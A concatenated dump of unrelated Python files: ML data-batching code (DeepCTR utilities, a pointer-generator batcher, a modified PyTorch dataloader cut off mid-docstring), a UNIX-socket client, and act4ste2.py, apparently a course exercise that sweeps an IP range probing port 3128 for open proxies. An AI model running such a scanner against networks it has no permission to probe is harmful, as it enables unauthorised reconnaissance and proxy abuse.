                  'AttentionSequencePoolingLayer': AttentionSequencePoolingLayer,
                  'CIN': CIN,
                  'InteractingLayer': InteractingLayer,}
# Config record for a variable-length (sequence) feature: `dimension` is the
# embedding vocab size, `maxlen` the padded sequence length, `combiner` the
# pooling mode (presumably 'sum'/'mean'/'max' -- confirm against callers).
VarLenFeat = collections.namedtuple(
    'VarLenFeatureConfig', ['name', 'dimension', 'maxlen', 'combiner'])
# Config record for a single (non-sequence) feature: name + vocab size.
SingleFeat = collections.namedtuple(
    'SingleFeatureConfig', ['name', 'dimension', ])
def concat_fun(inputs, axis=-1):
    """Concatenate a list of tensors along ``axis``.

    A single-element list is returned unchanged so no needless
    ``Concatenate`` op is added to the graph.
    """
    single = len(inputs) == 1
    return inputs[0] if single else Concatenate(axis=axis)(inputs)
def check_version(version):
    """Return version of package on pypi.python.org using json."""

    def _query_pypi(current):
        # Best-effort background check: swallow every failure silently so a
        # missing network connection never affects the caller.
        try:
            resp = requests.get('https://pypi.python.org/pypi/deepctr/json')
            newest = parse('0')
            current = parse(current)
            if resp.status_code == requests.codes.ok:
                payload = json.loads(resp.text.encode('utf-8'))
                # Find the newest non-prerelease version on PyPI.
                for release in payload.get('releases', []):
                    candidate = parse(release)
                    if not candidate.is_prerelease:
                        newest = max(newest, candidate)
                if newest > current:
                    logging.warning('\nDeepCTR version {0} detected. Your version is {1}.\nUse `pip install -U deepctr` to upgrade.Changelog: https://github.com/shenweichen/DeepCTR/releases/tag/v{0}'.format(
                        newest, current))
        except Exception:
            return

    # Run in the background so import/startup is never blocked by the network.
    Thread(target=_query_pypi, args=(version,)).start()
def check_feature_config_dict(feature_dim_dict):
    """Validate and normalise a feature-configuration dict in place.

    Ensures the 'sparse' and 'dense' keys exist (defaulting each to an
    empty list) and that both map to lists.

    Raises:
        ValueError: if the argument is not a dict or either key is not a list.
    """
    if not isinstance(feature_dim_dict, dict):
        raise ValueError(
            "feature_dim_dict must be a dict like {'sparse':{'field_1':4,'field_2':3,'field_3':2},'dense':['field_4','field_5']}")
    # Missing sections default to "no features of that kind".
    feature_dim_dict.setdefault('sparse', [])
    feature_dim_dict.setdefault('dense', [])
    if not isinstance(feature_dim_dict["sparse"], list):
        raise ValueError("feature_dim_dict['sparse'] must be a list,cur is", type(
            feature_dim_dict['sparse']))
    if not isinstance(feature_dim_dict["dense"], list):
        raise ValueError("feature_dim_dict['dense'] must be a list,cur is", type(
            feature_dim_dict['dense']))
|
batcher.py | #Most of this file is copied form https://github.com/abisee/pointer-generator/blob/master/batcher.py
import queue
import time
from random import shuffle
from threading import Thread
import numpy as np
import tensorflow as tf
import config
from . import data
import random
random.seed(1234)
class Example(object):
    """One article/abstract pair, tokenised and converted to word ids.

    Relies on module-level ``config`` (max_enc_steps, max_dec_steps,
    pointer_gen) and the ``data`` helper module for vocab lookups.
    """

    def __init__(self, article, abstract_sentences, vocab):
        # Get ids of special tokens
        start_decoding = vocab.word2id(data.START_DECODING)
        stop_decoding = vocab.word2id(data.STOP_DECODING)

        # Process the article
        article_words = article.split()
        if len(article_words) > config.max_enc_steps:
            article_words = article_words[:config.max_enc_steps]
        self.enc_len = len(article_words)  # store the length after truncation but before padding
        self.enc_input = [vocab.word2id(w) for w in article_words]  # list of word ids; OOVs are represented by the id for UNK token

        # Process the abstract
        abstract = ' '.join(abstract_sentences)  # string
        abstract_words = abstract.split()  # list of strings
        abs_ids = [vocab.word2id(w) for w in abstract_words]  # list of word ids; OOVs are represented by the id for UNK token

        # Get the decoder input sequence and target sequence
        self.dec_input, self.target = self.get_dec_inp_targ_seqs(abs_ids, config.max_dec_steps, start_decoding, stop_decoding)
        self.dec_len = len(self.dec_input)

        # If using pointer-generator mode, we need to store some extra info
        if config.pointer_gen:
            # Store a version of the enc_input where in-article OOVs are represented by their temporary OOV id; also store the in-article OOVs words themselves
            self.enc_input_extend_vocab, self.article_oovs = data.article2ids(article_words, vocab)
            # Get a version of the reference summary where in-article OOVs are represented by their temporary article OOV id
            abs_ids_extend_vocab = data.abstract2ids(abstract_words, vocab, self.article_oovs)
            # Overwrite decoder target sequence so it uses the temp article OOV ids
            _, self.target = self.get_dec_inp_targ_seqs(abs_ids_extend_vocab, config.max_dec_steps, start_decoding, stop_decoding)

        # Store the original strings
        self.original_article = article
        self.original_abstract = abstract
        self.original_abstract_sents = abstract_sentences

    def get_dec_inp_targ_seqs(self, sequence, max_len, start_id, stop_id):
        """Return (decoder_input, target).

        Input is [start_id] + ids; target is ids (+ stop_id when nothing
        was truncated).  Both are capped at max_len and have equal length.
        """
        inp = [start_id] + sequence[:]
        target = sequence[:]
        if len(inp) > max_len:  # truncate
            inp = inp[:max_len]
            target = target[:max_len]  # no end_token
        else:  # no truncation
            target.append(stop_id)  # end token
        assert len(inp) == len(target)
        return inp, target

    def pad_decoder_inp_targ(self, max_len, pad_id):
        """Pad decoder input and target with pad_id up to max_len (in place)."""
        while len(self.dec_input) < max_len:
            self.dec_input.append(pad_id)
        while len(self.target) < max_len:
            self.target.append(pad_id)

    def pad_encoder_input(self, max_len, pad_id):
        """Pad encoder input (and its extended-vocab copy) up to max_len."""
        while len(self.enc_input) < max_len:
            self.enc_input.append(pad_id)
        if config.pointer_gen:
            while len(self.enc_input_extend_vocab) < max_len:
                self.enc_input_extend_vocab.append(pad_id)
class Batch(object):
    """A minibatch of Examples, padded and packed into numpy arrays."""

    def __init__(self, example_list, vocab, batch_size):
        self.batch_size = batch_size
        self.pad_id = vocab.word2id(data.PAD_TOKEN)  # id of the PAD token used to pad sequences
        self.init_encoder_seq(example_list)  # initialize the input to the encoder
        self.init_decoder_seq(example_list)  # initialize the input and targets for the decoder
        self.store_orig_strings(example_list)  # store the original strings

    def init_encoder_seq(self, example_list):
        """Pad encoder inputs to this batch's max length and build the arrays."""
        # Determine the maximum length of the encoder input sequence in this batch
        max_enc_seq_len = max([ex.enc_len for ex in example_list])
        # Pad the encoder input sequences up to the length of the longest sequence
        for ex in example_list:
            ex.pad_encoder_input(max_enc_seq_len, self.pad_id)
        # Initialize the numpy arrays
        # Note: our enc_batch can have different length (second dimension) for each batch because we use dynamic_rnn for the encoder.
        self.enc_batch = np.zeros((self.batch_size, max_enc_seq_len), dtype=np.int32)
        self.enc_lens = np.zeros((self.batch_size), dtype=np.int32)
        self.enc_padding_mask = np.zeros((self.batch_size, max_enc_seq_len), dtype=np.float32)
        # Fill in the numpy arrays
        for i, ex in enumerate(example_list):
            self.enc_batch[i, :] = ex.enc_input[:]
            self.enc_lens[i] = ex.enc_len
            for j in range(ex.enc_len):
                self.enc_padding_mask[i][j] = 1
        # For pointer-generator mode, need to store some extra info
        if config.pointer_gen:
            # Determine the max number of in-article OOVs in this batch
            self.max_art_oovs = max([len(ex.article_oovs) for ex in example_list])
            # Store the in-article OOVs themselves
            self.art_oovs = [ex.article_oovs for ex in example_list]
            # Store the version of the enc_batch that uses the article OOV ids
            self.enc_batch_extend_vocab = np.zeros((self.batch_size, max_enc_seq_len), dtype=np.int32)
            for i, ex in enumerate(example_list):
                self.enc_batch_extend_vocab[i, :] = ex.enc_input_extend_vocab[:]

    def init_decoder_seq(self, example_list):
        """Pad decoder inputs/targets to config.max_dec_steps and build arrays."""
        # Pad the inputs and targets
        for ex in example_list:
            ex.pad_decoder_inp_targ(config.max_dec_steps, self.pad_id)
        # Initialize the numpy arrays.
        self.dec_batch = np.zeros((self.batch_size, config.max_dec_steps), dtype=np.int32)
        self.target_batch = np.zeros((self.batch_size, config.max_dec_steps), dtype=np.int32)
        self.dec_padding_mask = np.zeros((self.batch_size, config.max_dec_steps), dtype=np.float32)
        self.dec_lens = np.zeros((self.batch_size), dtype=np.int32)
        # Fill in the numpy arrays
        for i, ex in enumerate(example_list):
            self.dec_batch[i, :] = ex.dec_input[:]
            self.target_batch[i, :] = ex.target[:]
            self.dec_lens[i] = ex.dec_len
            for j in range(ex.dec_len):
                self.dec_padding_mask[i][j] = 1

    def store_orig_strings(self, example_list):
        """Keep the raw article/abstract strings for logging and evaluation."""
        self.original_articles = [ex.original_article for ex in example_list]  # list of lists
        self.original_abstracts = [ex.original_abstract for ex in example_list]  # list of lists
        self.original_abstracts_sents = [ex.original_abstract_sents for ex in example_list]  # list of list of lists
class Batcher(object):
    """Asynchronous batch producer.

    Background threads read Examples from ``data_path``, bucket them by
    encoder length, and expose finished Batches via :meth:`next_batch`.
    """

    BATCH_QUEUE_MAX = 100  # max number of batches the batch_queue can hold

    def __init__(self, data_path, vocab, mode, batch_size, single_pass):
        self._data_path = data_path
        self._vocab = vocab
        self._single_pass = single_pass
        self.mode = mode
        self.batch_size = batch_size
        # Initialize a queue of Batches waiting to be used, and a queue of Examples waiting to be batched
        # BUGFIX: use the Python 3 `queue` module imported at the top of this
        # file -- `Queue.Queue` was the Python 2 spelling and raises NameError.
        self._batch_queue = queue.Queue(self.BATCH_QUEUE_MAX)
        self._example_queue = queue.Queue(self.BATCH_QUEUE_MAX * self.batch_size)

        # Different settings depending on whether we're in single_pass mode or not
        if single_pass:
            self._num_example_q_threads = 1  # just one thread, so we read through the dataset just once
            self._num_batch_q_threads = 1  # just one thread to batch examples
            self._bucketing_cache_size = 1  # only load one batch's worth of examples before bucketing; this essentially means no bucketing
            self._finished_reading = False  # this will tell us when we're finished reading the dataset
        else:
            self._num_example_q_threads = 1  # 16 # num threads to fill example queue
            self._num_batch_q_threads = 1  # 4  # num threads to fill batch queue
            self._bucketing_cache_size = 1  # 100 # how many batches-worth of examples to load into cache before bucketing

        # Start the threads that load the queues
        self._example_q_threads = []
        for _ in range(self._num_example_q_threads):
            self._example_q_threads.append(Thread(target=self.fill_example_queue))
            self._example_q_threads[-1].daemon = True
            self._example_q_threads[-1].start()
        self._batch_q_threads = []
        for _ in range(self._num_batch_q_threads):
            self._batch_q_threads.append(Thread(target=self.fill_batch_queue))
            self._batch_q_threads[-1].daemon = True
            self._batch_q_threads[-1].start()

        # Start a thread that watches the other threads and restarts them if they're dead
        if not single_pass:  # We don't want a watcher in single_pass mode because the threads shouldn't run forever
            self._watch_thread = Thread(target=self.watch_threads)
            self._watch_thread.daemon = True
            self._watch_thread.start()

    def next_batch(self):
        """Return the next Batch, or None once a single pass is exhausted."""
        # If the batch queue is empty, print a warning
        if self._batch_queue.qsize() == 0:
            tf.logging.warning('Bucket input queue is empty when calling next_batch. Bucket queue size: %i, Input queue size: %i', self._batch_queue.qsize(), self._example_queue.qsize())
            if self._single_pass and self._finished_reading:
                tf.logging.info("Finished reading dataset in single_pass mode.")
                return None
        batch = self._batch_queue.get()  # get the next Batch
        return batch

    def fill_example_queue(self):
        """Thread body: read (article, abstract) pairs and enqueue Examples."""
        input_gen = self.text_generator(data.example_generator(self._data_path, self._single_pass))
        while True:
            try:
                (article, abstract) = next(input_gen)  # read the next example from file. article and abstract are both strings.
            except StopIteration:  # if there are no more examples:
                tf.logging.info("The example generator for this example queue filling thread has exhausted data.")
                if self._single_pass:
                    tf.logging.info("single_pass mode is on, so we've finished reading dataset. This thread is stopping.")
                    self._finished_reading = True
                    break
                else:
                    raise Exception("single_pass mode is off but the example generator is out of data; error.")
            abstract_sentences = [sent.strip() for sent in data.abstract2sents(abstract)]  # Use the <s> and </s> tags in abstract to get a list of sentences.
            example = Example(article, abstract_sentences, self._vocab)  # Process into an Example.
            self._example_queue.put(example)  # place the Example in the example queue.

    def fill_batch_queue(self):
        """Thread body: group Examples into length-sorted Batches."""
        while True:
            if self.mode == 'decode':
                # beam search decode mode single example repeated in the batch
                ex = self._example_queue.get()
                b = [ex for _ in range(self.batch_size)]
                self._batch_queue.put(Batch(b, self._vocab, self.batch_size))
            else:
                # Get bucketing_cache_size-many batches of Examples into a list, then sort
                inputs = []
                for _ in range(self.batch_size * self._bucketing_cache_size):
                    inputs.append(self._example_queue.get())
                inputs = sorted(inputs, key=lambda inp: inp.enc_len, reverse=True)  # sort by length of encoder sequence

                # Group the sorted Examples into batches, optionally shuffle the batches, and place in the batch queue.
                batches = []
                for i in range(0, len(inputs), self.batch_size):
                    batches.append(inputs[i:i + self.batch_size])
                if not self._single_pass:
                    shuffle(batches)
                for b in batches:  # each b is a list of Example objects
                    self._batch_queue.put(Batch(b, self._vocab, self.batch_size))

    def watch_threads(self):
        """Thread body: restart any queue-filling thread that has died."""
        while True:
            tf.logging.info(
                'Bucket queue size: %i, Input queue size: %i',
                self._batch_queue.qsize(), self._example_queue.qsize())
            time.sleep(60)
            for idx, t in enumerate(self._example_q_threads):
                if not t.is_alive():  # if the thread is dead
                    tf.logging.error('Found example queue thread dead. Restarting.')
                    new_t = Thread(target=self.fill_example_queue)
                    self._example_q_threads[idx] = new_t
                    new_t.daemon = True
                    new_t.start()
            for idx, t in enumerate(self._batch_q_threads):
                if not t.is_alive():  # if the thread is dead
                    tf.logging.error('Found batch queue thread dead. Restarting.')
                    new_t = Thread(target=self.fill_batch_queue)
                    self._batch_q_threads[idx] = new_t
                    new_t.daemon = True
                    new_t.start()

    def text_generator(self, example_generator):
        """Yield (article, abstract) text pairs from tf.Example protos,
        skipping malformed or empty-article examples."""
        while True:
            e = next(example_generator)  # e is a tf.Example
            try:
                article_text = e.features.feature['article'].bytes_list.value[0]  # the article text was saved under the key 'article' in the data files
                abstract_text = e.features.feature['abstract'].bytes_list.value[0]  # the abstract text was saved under the key 'abstract' in the data files
            except ValueError:
                tf.logging.error('Failed to get article or abstract from example')
                continue
            if len(article_text) == 0:  # See https://github.com/abisee/pointer-generator/issues/1
                # tf.logging.warning('Found an example with empty article text. Skipping it.')
                continue
            else:
                yield (article_text, abstract_text)
|
act4ste2.py |
#Name: Quy Nguyen
#python3
import sys
import requests
import ipaddress
import threading
# Shared across scanner threads: addresses found to be running an open proxy.
openProxyList = []
# All probe threads; joined before results are printed.
threads = []
ipList = []
#check an ip for open proxy
#https :1080
#ftp :3128
def checkOpenProxy(ip):
    """Probe ``ip`` for an open HTTP proxy on port 3128.

    Appends the address (as a string) to the shared ``openProxyList`` when
    an HTTP request routed through the proxy succeeds within 1 second.
    """
    try:
        # A successful fetch through the proxy means the proxy is open.
        # (The response body itself is irrelevant, so it is not kept.)
        requests.get("http://csec.rit.edu", timeout=1,
                     proxies={"http": "http://" + str(ip) + ":3128"})
        openProxyList.append(str(ip))
    except requests.RequestException:
        # BUGFIX: was a bare `except`, which also swallowed
        # KeyboardInterrupt/SystemExit; only network failures mean
        # "not an open proxy".
        pass
#get a list of IPs between startIP and endIP
def getIPList(startIP, endIP):
    """Return every IP address from startIP to endIP inclusive.

    An empty list is returned when startIP > endIP.
    """
    span = int(endIP) - int(startIP)
    return [startIP + offset for offset in range(span + 1)]
#https://docs.python.org/2/library/threading.html
#https://docs.python.org/2/library/threading.html
if __name__ == "__main__":
    # Usage: act4ste2.py <start-ip> <end-ip>
    if len(sys.argv) != 3:
        print("Please input a start IP and an end IP address:")
        sys.exit()
    # Parse the scan range from the command line.
    startIP = ipaddress.ip_address(sys.argv[1])
    endIP = ipaddress.ip_address(sys.argv[2])
    ipList = getIPList(startIP, endIP)
    # Launch one probe thread per candidate address.
    for ip in ipList:
        worker = threading.Thread(target=checkOpenProxy, args=(ip,))
        threads.append(worker)
        worker.start()
    # Wait for every probe to finish so openProxyList is complete.
    for worker in threads:
        worker.join()
    # Report the results.
    print("IPs that have open proxy:")
    for ip in openProxyList:
        print(ip)
|
client.py | #!/usr/bin/env python3
import socket
import struct
import threading
# Filesystem path of the server's UNIX-domain socket.
SERVER_SOCKET_PATH = "./socket"
# Wire format: one unsigned 32-bit integer, network (big-endian) byte order.
FMT = "!L"
def read_number_from_socket(connection):
    """Read one network-order uint32 from the socket and return it as int."""
    # NOTE(review): assumes recv() delivers all 4 bytes in a single call.
    raw = connection.recv(4)
    (value,) = struct.unpack(FMT, raw)
    return value
def write_number_to_socket(connection, number):
    """Send *number* over the socket as a network-order uint32."""
    payload = struct.pack(FMT, number)
    connection.send(payload)
def client(t_id):
    """Replay the commands in ./input.txt against the UNIX-socket server.

    Each whitespace-separated token is sent as a uint32; after each token
    the server's reply -- a count followed by that many values -- is read
    back and printed.  `t_id` identifies this client thread in the output.
    """
    sock = socket.socket(socket.AF_UNIX)
    sock.connect(SERVER_SOCKET_PATH)
    with open('./input.txt', 'r') as fp:
        commands = fp.read()
    for command in commands.splitlines():
        for opt in command.split():
            # Send one number, then consume the server's full response for it.
            sock.send(struct.pack(FMT, int(opt)))
            value_cnt = read_number_from_socket(sock)
            print(value_cnt)
            for _ in range(value_cnt):
                value = read_number_from_socket(sock)
                #print('tid', t_id, value)
                print(value)
    sock.close()
    print('termnated', t_id)
def main():
    """Spawn the client thread(s) against the UNIX-socket server."""
    workers = [threading.Thread(target=client, args=(t_id,))
               for t_id in range(1)]
    for worker in workers:
        worker.start()


if __name__ == "__main__":
    main()
|
dataloader.py | import random
import torch
import torch.multiprocessing as multiprocessing
from torch._C import _set_worker_signal_handlers, \
_remove_worker_pids, _error_if_any_worker_fails
from packaging import version
if version.Version(torch.__version__) >= version.Version('1.0.0'):
from torch._C import _set_worker_pids
else:
from torch._C import _update_worker_pids as _set_worker_pids
from torch.utils.data import SequentialSampler, RandomSampler, BatchSampler
import signal
import functools
import collections
import re
import sys
import threading
import traceback
import os
import time
from torch._six import string_classes, int_classes, FileNotFoundError
IS_WINDOWS = sys.platform == "win32"
if IS_WINDOWS:
import ctypes
from ctypes.wintypes import DWORD, BOOL, HANDLE
if sys.version_info[0] == 2:
import Queue as queue
else:
import queue
class ExceptionWrapper(object):
    r"""Wraps an exception plus traceback to communicate across threads"""

    def __init__(self, exc_info):
        # Keep the type and a fully formatted traceback string; the live
        # traceback object itself is not picklable across processes.
        exc_type, exc_value, tb = exc_info
        self.exc_type = exc_type
        self.exc_msg = "".join(
            traceback.format_exception(exc_type, exc_value, tb))
# Flipped to True inside worker processes (see _worker_loop) so that
# default_collate allocates its output tensors in shared memory.
_use_shared_memory = False
r"""Whether to use shared memory in default_collate"""

# Seconds a worker waits on its index queue before re-checking that the
# manager (parent) process is still alive.
MANAGER_STATUS_CHECK_INTERVAL = 5.0
if IS_WINDOWS:
    # On Windows, the parent ID of the worker process remains unchanged when the manager process
    # is gone, and the only way to check it through OS is to let the worker have a process handle
    # of the manager and ask if the process status has changed.
    class ManagerWatchdog(object):
        """Detects death of the manager (parent) process on Windows."""

        def __init__(self):
            self.manager_pid = os.getppid()

            self.kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
            self.kernel32.OpenProcess.argtypes = (DWORD, BOOL, DWORD)
            self.kernel32.OpenProcess.restype = HANDLE
            self.kernel32.WaitForSingleObject.argtypes = (HANDLE, DWORD)
            self.kernel32.WaitForSingleObject.restype = DWORD

            # Value obtained from https://msdn.microsoft.com/en-us/library/ms684880.aspx
            SYNCHRONIZE = 0x00100000
            self.manager_handle = self.kernel32.OpenProcess(SYNCHRONIZE, 0, self.manager_pid)

            if not self.manager_handle:
                raise ctypes.WinError(ctypes.get_last_error())

        def is_alive(self):
            """True while the manager process handle is not yet signalled."""
            # Value obtained from https://msdn.microsoft.com/en-us/library/windows/desktop/ms687032.aspx
            return self.kernel32.WaitForSingleObject(self.manager_handle, 0) != 0
else:
    class ManagerWatchdog(object):
        """Detects death of the manager (parent) process on POSIX."""

        def __init__(self):
            self.manager_pid = os.getppid()

        def is_alive(self):
            # When the parent dies the worker is re-parented, so getppid()
            # no longer matches the pid recorded at startup.
            return os.getppid() == self.manager_pid
def _worker_loop(dataset, index_queue, data_queue, collate_fn, init_fn, worker_id):
    """Worker-process main loop.

    Pulls ``(idx, batch_indices)`` requests from ``index_queue``, collates
    the corresponding dataset samples, and pushes ``(idx, samples)`` -- or
    ``(idx, ExceptionWrapper)`` on failure -- onto ``data_queue``.  Exits
    on a ``None`` sentinel or when the parent process dies.
    """
    global _use_shared_memory
    _use_shared_memory = True

    # Intialize C side signal handlers for SIGBUS and SIGSEGV. Python signal
    # module's handlers are executed after Python returns from C low-level
    # handlers, likely when the same fatal signal happened again already.
    # https://docs.python.org/3/library/signal.html Sec. 18.8.1.1
    _set_worker_signal_handlers()

    # One process per worker already; avoid intra-process thread contention.
    torch.set_num_threads(1)
    if init_fn is not None:
        init_fn(worker_id)

    watchdog = ManagerWatchdog()

    while True:
        try:
            r = index_queue.get(timeout=MANAGER_STATUS_CHECK_INTERVAL)
        except queue.Empty:
            # Periodically verify the parent is alive; exit when it is not.
            if watchdog.is_alive():
                continue
            else:
                break
        if r is None:
            # Sentinel from the parent: shut down cleanly.
            break
        idx, batch_indices = r
        try:
            samples = collate_fn([dataset[i] for i in batch_indices])
        except Exception:
            # Ship the traceback to the parent instead of dying silently.
            data_queue.put((idx, ExceptionWrapper(sys.exc_info())))
        else:
            data_queue.put((idx, samples))
            # Drop our reference promptly so shared memory can be released.
            del samples
def _worker_manager_loop(in_queue, out_queue, done_event, pin_memory, device_id):
    """Parent-side thread: forward worker results, optionally pinning memory.

    Moves ``(idx, batch)`` pairs from ``in_queue`` to ``out_queue``.  When
    ``pin_memory`` is set, batches are first copied into page-locked memory
    (with CUDA device ``device_id`` selected).  Exits on a ``None`` sentinel,
    or silently once ``done_event`` is set and the queue read fails.
    """
    if pin_memory:
        torch.cuda.set_device(device_id)

    while True:
        try:
            r = in_queue.get()
        except Exception:
            if done_event.is_set():
                # We are shutting down; the queue may already be torn down.
                return
            raise
        if r is None:
            break
        if isinstance(r[1], ExceptionWrapper):
            # Pass worker-side errors straight through untouched.
            out_queue.put(r)
            continue
        idx, batch = r
        try:
            if pin_memory:
                batch = pin_memory_batch(batch)
        except Exception:
            out_queue.put((idx, ExceptionWrapper(sys.exc_info())))
        else:
            out_queue.put((idx, batch))
# Maps numpy dtype names to the matching CPU torch tensor constructor;
# used by default_collate for batches of numpy scalars.
numpy_type_map = {
    'float64': torch.DoubleTensor,
    'float32': torch.FloatTensor,
    'float16': torch.HalfTensor,
    'int64': torch.LongTensor,
    'int32': torch.IntTensor,
    'int16': torch.ShortTensor,
    'int8': torch.CharTensor,
    'uint8': torch.ByteTensor,
}
def default_collate(batch):
    r"""Puts each data field into a tensor with outer dimension batch size.

    Handles torch tensors, numpy arrays/scalars, Python numbers, strings,
    and (recursively) mappings and sequences of any of those.

    Raises:
        TypeError: for unsupported element types or string-typed ndarrays.
    """
    # BUGFIX: `collections.Mapping`/`collections.Sequence` aliases were
    # removed in Python 3.10; use `collections.abc` explicitly.  Imported
    # locally so this function stays self-contained.
    import collections.abc
    error_msg = "batch must contain tensors, numbers, dicts or lists; found {}"
    elem_type = type(batch[0])
    if isinstance(batch[0], torch.Tensor):
        out = None
        if _use_shared_memory:
            # If we're in a background process, concatenate directly into a
            # shared memory tensor to avoid an extra copy
            numel = sum([x.numel() for x in batch])
            storage = batch[0].storage()._new_shared(numel)
            out = batch[0].new(storage)
        return torch.stack(batch, 0, out=out)
    elif elem_type.__module__ == 'numpy' and elem_type.__name__ != 'str_' \
            and elem_type.__name__ != 'string_':
        elem = batch[0]
        if elem_type.__name__ == 'ndarray':
            # array of string classes and object
            if re.search('[SaUO]', elem.dtype.str) is not None:
                raise TypeError(error_msg.format(elem.dtype))
            return torch.stack([torch.from_numpy(b) for b in batch], 0)
        if elem.shape == ():  # scalars
            py_type = float if elem.dtype.name.startswith('float') else int
            return numpy_type_map[elem.dtype.name](list(map(py_type, batch)))
    elif isinstance(batch[0], int_classes):
        return torch.LongTensor(batch)
    elif isinstance(batch[0], float):
        return torch.DoubleTensor(batch)
    elif isinstance(batch[0], string_classes):
        return batch
    elif isinstance(batch[0], collections.abc.Mapping):
        # Collate each key across the batch independently.
        return {key: default_collate([d[key] for d in batch]) for key in batch[0]}
    elif isinstance(batch[0], collections.abc.Sequence):
        # Collate position-wise: a batch of tuples becomes a tuple of batches.
        transposed = zip(*batch)
        return [default_collate(samples) for samples in transposed]

    raise TypeError((error_msg.format(type(batch[0]))))
def pin_memory_batch(batch):
    """Recursively copy every tensor in *batch* into pinned (page-locked)
    memory; non-tensor leaves are returned unchanged."""
    # BUGFIX: `collections.Mapping`/`collections.Sequence` aliases were
    # removed in Python 3.10; use `collections.abc` explicitly.  Imported
    # locally so this function stays self-contained.
    import collections.abc
    if isinstance(batch, torch.Tensor):
        return batch.pin_memory()
    elif isinstance(batch, string_classes):
        return batch
    elif isinstance(batch, collections.abc.Mapping):
        return {k: pin_memory_batch(sample) for k, sample in batch.items()}
    elif isinstance(batch, collections.abc.Sequence):
        return [pin_memory_batch(sample) for sample in batch]
    else:
        return batch
# Module-level guard so the SIGCHLD handler is installed at most once.
_SIGCHLD_handler_set = False
r"""Whether SIGCHLD handler is set for DataLoader worker failures. Only one
handler needs to be set for all DataLoaders in a process."""
def _set_SIGCHLD_handler():
    """Install (once, main thread only) a SIGCHLD handler that surfaces
    worker-process failures, chaining to any previously set handler."""
    # Windows doesn't support SIGCHLD handler
    if sys.platform == 'win32':
        return
    # can't set signal in child threads
    if not isinstance(threading.current_thread(), threading._MainThread):
        return
    global _SIGCHLD_handler_set
    if _SIGCHLD_handler_set:
        return
    previous_handler = signal.getsignal(signal.SIGCHLD)
    if not callable(previous_handler):
        # SIG_DFL/SIG_IGN etc. -- nothing meaningful to chain to.
        previous_handler = None

    def handler(signum, frame):
        # This following call uses `waitid` with WNOHANG from C side. Therefore,
        # Python can still get and update the process status successfully.
        _error_if_any_worker_fails()
        if previous_handler is not None:
            previous_handler(signum, frame)

    signal.signal(signal.SIGCHLD, handler)
    _SIGCHLD_handler_set = True
class _SequentialDataLoaderIter(object):
r"""Iterates once over the DataLoader's dataset, as specified by the sampler"""
def __init__(self, loader):
self.dataset = loader.dataset
self.collate_fn = loader.collate_fn
self.batch_sampler = loader.batch_sampler
self.num_workers = loader.num_workers
self.pin_memory = loader.pin_memory and torch.cuda.is_available()
self.timeout = loader.timeout
self.done_event = threading.Event()
self.sample_iter = iter(self.batch_sampler)
if self.num_workers > 0:
self.worker_init_fn = loader.worker_init_fn
self.index_queues = [multiprocessing.Queue() for _ in range(self.num_workers)]
self.worker_queue_idx = 0
self.worker_result_queue = multiprocessing.SimpleQueue()
self.batches_outstanding = 0
self.worker_pids_set = False
self.shutdown = False
self.send_idx = 0
self.rcvd_idx = 0
self.reorder_dict = {}
self.workers = [
multiprocessing.Process(
target=_worker_loop,
args=(self.dataset, self.index_queues[i],
self.worker_result_queue, self.collate_fn, self.worker_init_fn, i))
for i in range(self.num_workers)]
if self.pin_memory or self.timeout > 0:
self.data_queue = queue.Queue()
if self.pin_memory:
maybe_device_id = torch.cuda.current_device()
else:
# do not initialize cuda context if not necessary
maybe_device_id = None
self.worker_manager_thread = threading.Thread(
target=_worker_manager_loop,
args=(self.worker_result_queue, self.data_queue, self.done_event, self.pin_memory,
maybe_device_id))
self.worker_manager_thread.daemon = True
self.worker_manager_thread.start()
else:
self.data_queue = self.worker_result_queue
for w in self.workers:
w.daemon = True # ensure that the worker exits on process exit
w.start()
_set_worker_pids(id(self), tuple(w.pid for w in self.workers))
_set_SIGCHLD_handler()
self.worker_pids_set = True
# prime the prefetch loop
for _ in range(2 * self.num_workers):
self._put_indices()
def __len__(self):
return len(self.batch_sampler)
def _get_batch(self):
if self.timeout > 0:
try:
return self.data_queue.get(timeout=self.timeout)
except queue.Empty:
raise RuntimeError('DataLoader timed out after {} seconds'.format(self.timeout))
else:
return self.data_queue.get()
def __next__(self):
if self.num_workers == 0: # same-process loading
indices = next(self.sample_iter) # may raise StopIteration
batch = self.collate_fn([self.dataset[i] for i in indices])
if self.pin_memory:
batch = pin_memory_batch(batch)
return batch
# check if the next sample has already been generated
if self.rcvd_idx in self.reorder_dict:
batch = self.reorder_dict.pop(self.rcvd_idx)
return self._process_next_batch(batch)
if self.batches_outstanding == 0:
self._shutdown_workers()
raise StopIteration
while True:
assert (not self.shutdown and self.batches_outstanding > 0)
idx, batch = self._get_batch()
self.batches_outstanding -= 1
if idx != self.rcvd_idx:
# store out-of-order samples
self.reorder_dict[idx] = batch
continue
return self._process_next_batch(batch)
next = __next__ # Python 2 compatibility
def __iter__(self):
return self
def _put_indices(self):
assert self.batches_outstanding < 2 * self.num_workers
indices = next(self.sample_iter, None)
if indices is None:
return
self.index_queues[self.worker_queue_idx].put((self.send_idx, indices))
self.worker_queue_idx = (self.worker_queue_idx + 1) % self.num_workers
self.batches_outstanding += 1
self.send_idx += 1
def _process_next_batch(self, batch):
self.rcvd_idx += 1
self._put_indices()
if isinstance(batch, ExceptionWrapper):
raise batch.exc_type(batch.exc_msg)
return batch
def __getstate__(self):
# TODO: add limited pickling support for sharing an iterator
# across multiple threads for HOGWILD.
# Probably the best way to do this is by moving the sample pushing
# to a separate thread and then just sharing the data queue
# but signalling the end is tricky without a non-blocking API
raise NotImplementedError("_SequentialDataLoaderIter cannot be pickled")
def _shutdown_workers(self):
try:
if not self.shutdown:
self.shutdown = True
self.done_event.set()
for q in self.index_queues:
q.put(None)
# if some workers are waiting to put, make place for them
try:
while not self.worker_result_queue.empty():
self.worker_result_queue.get()
except (FileNotFoundError, ImportError):
# Many weird errors can happen here due to Python
# shutting down. These are more like obscure Python bugs.
# FileNotFoundError can happen when we rebuild the fd
# fetched from the queue but the socket is already closed
# from the worker side.
# ImportError can happen when the unpickler loads the
# resource from `get`.
pass
# done_event should be sufficient to exit worker_manager_thread,
# but be safe here and put another None
self.worker_result_queue.put(None)
finally:
# removes pids no matter what
if self.worker_pids_set:
_remove_worker_pids(id(self))
self.worker_pids_set = False
def __del__(self):
    # Best-effort cleanup: only needed when worker processes were spawned.
    if self.num_workers > 0:
        self._shutdown_workers()
class SequentialDataLoader(object):
    r"""
    Sequential data loader: pairs a dataset with a sampler and yields
    single- or multi-process iterators over the dataset.

    Modified from torch's DataLoader so that purely sequential loading never
    touches any random state.

